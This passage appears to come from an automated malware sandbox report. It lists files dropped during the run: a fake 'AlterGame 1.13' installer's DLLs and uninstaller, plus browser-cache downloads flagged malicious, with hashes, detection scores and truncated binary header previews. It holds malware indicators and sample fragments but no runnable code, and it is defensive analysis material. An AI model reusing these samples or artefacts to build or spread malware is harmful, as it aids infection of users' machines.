                                                                SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1645320
                                                                Entropy (8bit):6.787752063353702
                                                                Encrypted:false
                                                                SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                MD5:871C903A90C45CA08A9D42803916C3F7
                                                                SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-85EG4.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828878301341
                                                                Encrypted:false
                                                                SSDEEP:49152:GVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:cQROSGqEEC5sWCyaPilv
                                                                MD5:B369E8685C117CBD527C775F2BB67A07
                                                                SHA1:D04B1107DD1A49CCD1C73252CBE5C9C789AAE0CE
                                                                SHA-256:081DB5D6609D54BDE700EAB1BA41B2341393E0B73AC87EC31A12B9C514D83F53
                                                                SHA-512:D378E6C2DF4A7BBCC2F80D0B647C02BC1CC6727E226B4C8D0DB9F553D21DEE34E5C62DDA8B07AFD828E6A72BF89D3122C8A11C5D4DAFDA9C9A64C7D670F4BC09
                                                                Malicious:false
                                                                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....n.L............................L.............@..........................PA.....B.A.....................................l............_.........................................................................................................._qrsa_4............................. ..`_qrsb_4..*.......,..................@..@_qrsc_4..c...@...0...(..............@....rsrc....`.......`...X..............@..@_qrsd_4..:...."..8....!.............`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):348160
                                                                Entropy (8bit):6.542655141037356
                                                                Encrypted:false
                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):265728
                                                                Entropy (8bit):6.4472652154517345
                                                                Encrypted:false
                                                                SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):499712
                                                                Entropy (8bit):6.414789978441117
                                                                Encrypted:false
                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-Q68BS.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:MS Windows HtmlHelp Data
                                                                Category:dropped
                                                                Size (bytes):78183
                                                                Entropy (8bit):7.692742945771669
                                                                Encrypted:false
                                                                SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                Malicious:false
                                                                Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):6.204917493416147
                                                                Encrypted:false
                                                                SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445440
                                                                Entropy (8bit):6.439135831549689
                                                                Encrypted:false
                                                                SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                MD5:CAC7E17311797C5471733638C0DC1F01
                                                                SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445440
                                                                Entropy (8bit):6.439135831549689
                                                                Encrypted:false
                                                                SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                MD5:CAC7E17311797C5471733638C0DC1F01
                                                                SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):499712
                                                                Entropy (8bit):6.414789978441117
                                                                Encrypted:false
                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):348160
                                                                Entropy (8bit):6.542655141037356
                                                                Encrypted:false
                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\sqlite3.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\is-CUGJK.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):715253
                                                                Entropy (8bit):6.514700613803512
                                                                Encrypted:false
                                                                SSDEEP:12288:r/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyFW:bkqZ1G7DMvrP537dzHsA6hcHGbH3EahX
                                                                MD5:AE19918E9A2F183E6DC54F47D905A105
                                                                SHA1:4D0AA8F6F6A9DB774D5E48D80FF76796A5FBCACA
                                                                SHA-256:B916FA0E8B7332FAADCB5E756DD8183555627E57ABCF332A5978ECABD9FBDF03
                                                                SHA-512:D8B1C199FDBC86335437F6353FCA2809AF3B959AC225BFA41BA2C78EFF4C324B38FA7573C8A244DBE03B4434DCED730DA43167E0C1EAA6811D4190AAAE53BC24
                                                                Malicious:true
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:InnoSetup Log AlterGame, version 0x30, 4858 bytes, 082561\user, "C:\Users\user\AppData\Local\AlterGame 1.13"
                                                                Category:dropped
                                                                Size (bytes):4858
                                                                Entropy (8bit):4.71272727773437
                                                                Encrypted:false
                                                                SSDEEP:96:PyWnJ8QpLsCR9n+eOIhIC7ICSss/LnMx99:PyWnJ7pLkHIhvICSsAnU
                                                                MD5:EDCF2B7D055A68652CE182E27E2A35A8
                                                                SHA1:7056AA57AD924B943309420BF734B1A62AA1FDA8
                                                                SHA-256:68159DEBA03FDFACA5255C68E2DD6E9D6FA4C8A703554DB65E1D0412D9E1FC31
                                                                SHA-512:2EC2DDBF5977EC744E0F51873E3D018BF3C9FC6255AE36D74B421B1E874B2005716B638DC7912A97607D9914BE1CC4E6EB3AE9D472B6B395D9B893382E4B1972
                                                                Malicious:false
                                                                Preview:Inno Setup Uninstall Log (b)....................................AlterGame.......................................................................................................................AlterGame.......................................................................................................................0...........%...............................................................................................................8.2.........M.m.......K....082561.user+C:\Users\user\AppData\Local\AlterGame 1.13.................. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.exe (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):715253
                                                                Entropy (8bit):6.514700613803512
                                                                Encrypted:false
                                                                SSDEEP:12288:r/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyFW:bkqZ1G7DMvrP537dzHsA6hcHGbH3EahX
                                                                MD5:AE19918E9A2F183E6DC54F47D905A105
                                                                SHA1:4D0AA8F6F6A9DB774D5E48D80FF76796A5FBCACA
                                                                SHA-256:B916FA0E8B7332FAADCB5E756DD8183555627E57ABCF332A5978ECABD9FBDF03
                                                                SHA-512:D8B1C199FDBC86335437F6353FCA2809AF3B959AC225BFA41BA2C78EFF4C324B38FA7573C8A244DBE03B4434DCED730DA43167E0C1EAA6811D4190AAAE53BC24
                                                                Malicious:true
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ebAAb6KfuCx7.exe.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42
                                                                Entropy (8bit):4.0050635535766075
                                                                Encrypted:false
                                                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.990387966645919
                                                                Encrypted:false
                                                                SSDEEP:48:65uxic/UNMSAjItYiA254tdqlkCuFCpfbNtm:cc9jItYbaC+zNt
                                                                MD5:F328A95046E3A2514C36347EAEC911C0
                                                                SHA1:8EC9C18384CA1E08A397BF7B3D46B6D784669EF0
                                                                SHA-256:D55E86610DCAD29C3D2857D9DAE91AA51228B1FA001EA2D7BDA88B9A2B5570A9
                                                                SHA-512:2FC3621433C5DA3DCB5B9D9133CD9D63D8F53FD60C81DDAB8B83BAD60EFB98942FC38A63DFA98EDFC8358C8E4E345A7EC8FA3AA14C18D4337CDD90EA0AED4718
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............&... ...@....@.. ....................................@..................................&..O....@.......................`.......%..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......\ ...............................................................*..(....*..BSJB............v4.0.30319......l.......#~..,...H...#Strings....t.......#US.x.......#GUID...........#Blob...........G..........3..........................................x...............Z.....!.....,.....I.................A...........&.....`.....5.................{.....@.........................A.....P ........#...R ................;...................).....1.....9.....A.....I.....Q.....Y.....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):97296
                                                                Entropy (8bit):7.9982317718947025
                                                                Encrypted:true
                                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
